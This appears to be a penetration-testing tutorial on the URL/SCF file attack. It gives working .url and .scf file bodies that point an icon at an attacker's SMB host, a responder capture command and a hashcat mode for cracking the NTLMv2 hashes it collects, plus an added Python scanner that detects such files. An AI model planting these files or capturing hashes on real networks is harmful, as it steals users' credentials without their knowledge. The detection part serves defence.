What is a URL File Attack?
A URL file attack captures account hashes when a user opens a folder that contains a specially crafted file which forces the user's machine to request an icon from the attacker's machine. The resource does not actually exist; the act of initiating a connection to the attacker's machine is what allows the hash to be captured. Also note that the user does not need to open the file, nor is there any indication that anything has happened behind the scenes. They only need to open the folder the file is located in, which makes this perfect for shared folders.
The file name must begin with either a “@” symbol or a “~” symbol and the filetype must be “url”. Example: “@readme.url”
    [InternetShortcut]
    URL=http://google.com
    WorkingDirectory=%username%
    IconFile=\\192.168.1.240\%USERNAME%.icon
    IconIndex=1
The same can be done with an scf file. Example: @readme.scf
    [Shell]
    Command=2
    IconFile=\\192.168.1.240\Share\test.ico
    [Taskbar]
    Command=ToggleDesktop
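Both file formats above are plain INI text, and the tell-tale sign in each is an IconFile entry that points at a UNC path rather than a local file. As an added example (not part of the original write-up), here is a Python scanner a share owner or responder can run over a folder to find .url and .scf files with that property. The sample file bodies and the 192.0.2.10 host are constructed for the demo; 192.0.2.10 is a documentation address, not a real machine.

```python
import configparser
import re
import tempfile
from pathlib import Path

# Matches a UNC path such as \\192.0.2.10\share\icon.ico and captures the host.
UNC_PATH = re.compile(r"^\\\\([^\\]+)\\")

# Extensions Windows Explorer renders with an external icon when listing a folder.
SHORTCUT_SUFFIXES = {".url", ".scf"}


def parse_shortcut(text: str) -> dict:
    """Parse the INI-style body of a .url/.scf file into an upper-cased key map.

    Key case is normalised so IconFile/iconfile compare equal, and %VAR%
    interpolation is disabled so values like %USERNAME% pass through untouched.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.upper
    cp.read_string(text)
    fields = {}
    for section in cp.sections():
        for key, value in cp.items(section):
            fields[key] = value.strip()
    return fields


def remote_icon_host(text: str):
    """Return the UNC host named by IconFile, or None if the icon is local."""
    icon = parse_shortcut(text).get("ICONFILE", "")
    m = UNC_PATH.match(icon)
    return m.group(1) if m else None


def classify(name: str, text: str) -> dict:
    """Decide whether a single file matches the remote-icon shortcut pattern."""
    suffix = Path(name).suffix.lower()
    if suffix not in SHORTCUT_SUFFIXES:
        return {"name": name, "flag": False, "host": None, "reason": "not a shortcut file"}
    try:
        host = remote_icon_host(text)
    except configparser.Error as exc:  # malformed INI in a shortcut is still worth a look
        return {"name": name, "flag": True, "host": None, "reason": f"unparseable: {exc}"}
    if host is None:
        return {"name": name, "flag": False, "host": None, "reason": "icon is local"}
    reason = "IconFile points at a UNC path"
    if name[:1] in ("@", "~"):
        reason += "; name uses the @/~ prefix described in the write-up"
    return {"name": name, "flag": True, "host": host, "reason": reason}


def scan_directory(root) -> list:
    """Walk a folder (e.g. a mounted share) and return findings for flagged files."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SHORTCUT_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            result = classify(path.name, text)
            if result["flag"]:
                findings.append(result)
    return findings


# Constructed samples (not taken from a real share).
SAMPLE_URL = "[InternetShortcut]\nURL=http://example.com\nIconFile=\\\\192.0.2.10\\share\\x.ico\nIconIndex=1\n"
SAMPLE_SCF = "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\test.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
BENIGN_URL = "[InternetShortcut]\nURL=http://example.com\nIconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n"


def demo() -> list:
    """Write the samples into a temp folder, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for fname, body in (("@readme.url", SAMPLE_URL), ("~notes.scf", SAMPLE_SCF), ("ok.url", BENIGN_URL)):
            (Path(tmp) / fname).write_text(body, encoding="utf-8")
        return scan_directory(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['name']}: {f['reason']} (host {f['host']})")
```

Run it against a share mount point instead of the temp folder to get a list of files whose icon resolves to another host; the benign sample shows that a shortcut with a local icon path is left alone, and a file that fails to parse is flagged rather than silently skipped.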
Make sure HTTP and SMB are turned ON in responder (these are the default responder settings).
responder -I eth0 -rdwv
Capture the Hash
The hash captured in responder belongs to whichever user opens the folder. Note that it is an NTLMv2 hash 🙂 Hashcat mode: 5600